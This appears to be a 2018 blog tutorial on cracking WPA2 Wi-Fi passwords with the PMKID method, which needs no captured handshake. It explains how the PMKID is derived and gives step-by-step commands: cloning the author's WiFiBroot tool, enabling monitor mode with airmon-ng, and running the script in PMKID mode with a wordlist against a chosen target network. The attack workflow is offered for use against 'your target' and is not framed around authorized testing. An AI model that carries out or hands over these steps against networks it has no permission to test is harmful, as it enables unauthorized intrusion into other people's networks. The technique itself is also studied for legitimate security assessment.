Hack WiFi: How to Crack WPA2 without handshake, new PMKID method

by hash3liZer . 20 August 2018

Hack WiFi: How to Crack WPA2 without handshake, new PMKID method

I last ran on the tutorial about Cracking WPA2 using PMKID, a newly discovered method by Jens Steube and added to the tool of his hashcat. What's special about this method is that an attacker no longer needs to capture the handshake. The First message of the 4-way handshake contains a field called PMKID which is basically derived from the Pairwise Master Key (PMK) and can be used a medium to crack the password as same as we do with MIC code.

PMKID is an identifier for PMK whose derivation method goes like this:

PMKID = HMAC-SHA-128(PMK, "PMK Name" + AP MAC + STA MAC)

It is basically the HMAC function of derived PMKs as the key and concatenation of a fixed string and MACs of AP and Client as the data to function. More, it means to every different password, there would be a different PMKID which can be cracked just as the other method works for MIC.

However, this method is a bit quicker as we are skipping the step to compute PTK (Pairwise Transient Key), more reliable and shorter. An attacker has to perform successful authentication and association with the Access Point which will result in transmitting of first EAPOL message that contains the key.

Considering all of the above under observation, I'd some shortcomings with hashcat especially, I don't have an Alpha adapter. So, I did some research and added this new cracking method to my script which I would like to share with you. You'll see in a few steps why I've written all of this again instead of maybe doing a shell scripting thing.

STEP 1

Cloning and Interface

Clone into the repository with git clone and move to the directory:

$ git clone https://github.com/hash3liZer/WiFiBroot.git
$ cd WiFiBroot/
WiFiBroot

WiFiBroot heavily depends on scapy which is basically a packet manipulation module and an extensive networking library. So, install scapy with pip:

$ pip install scapy

Next, put your wireless card in monitor mode. You can use an adapter that supports packet injection as well as promiscuous mode, no special needs for an Alpha adapter, just make sure you are close enough to your target:

$ airmon-ng start wlan1

STEP 2

Kick-Sart WiFiBroot

WiFiBroot supports two running modes, one is for the handshake method, the other one has just been added to the script which uses PMKID to crack the key. Kick-start WiFiBroot:

$ python wifibroot.py -i wlan1mon -m 2 --dictionary /path/to/wordlist --verbose
  • -m, --mode: Mode to use. Possible values: 1, 2
wifibroot in mode 2

This would start scanning the area for available networks. When you've your target on screen, press CTRL+C to stop the scanning for further execution. Then enter your target number as seen on the left side of console:

console output

STEP 3

Wait for the EAPOL

The next thing which is going to happen is almost automated. You just have to wait for a successful authentication with the Access Point (AP). As soon an EAPOL will get issued to the STA, the script will look for PMKID field and if not zero will attempt to crack the key using the dictionary provided:

pmkid

You can see the following events happening in series:

  • Open Authentication
  • Association
  • 4-way handshake

Here, we got the PMKID:

pmkid

STEP 4

Cracking

When the PMKID will be cached, cracking process will be started and print the passphrase if so found in dictionary with the used hashes, respectively PMKID and PMK, if ran in verbose mode:

cracked pass

Conclusion

Today, we saw to use WiFiBroot to crack WPA2 passwords by using a newly discovered method, thanks to Jens Steube. An attacker now don't need to capture handshakes. For the information, it is only WPA2 that is affected. In case of WPA, a handshake is still required.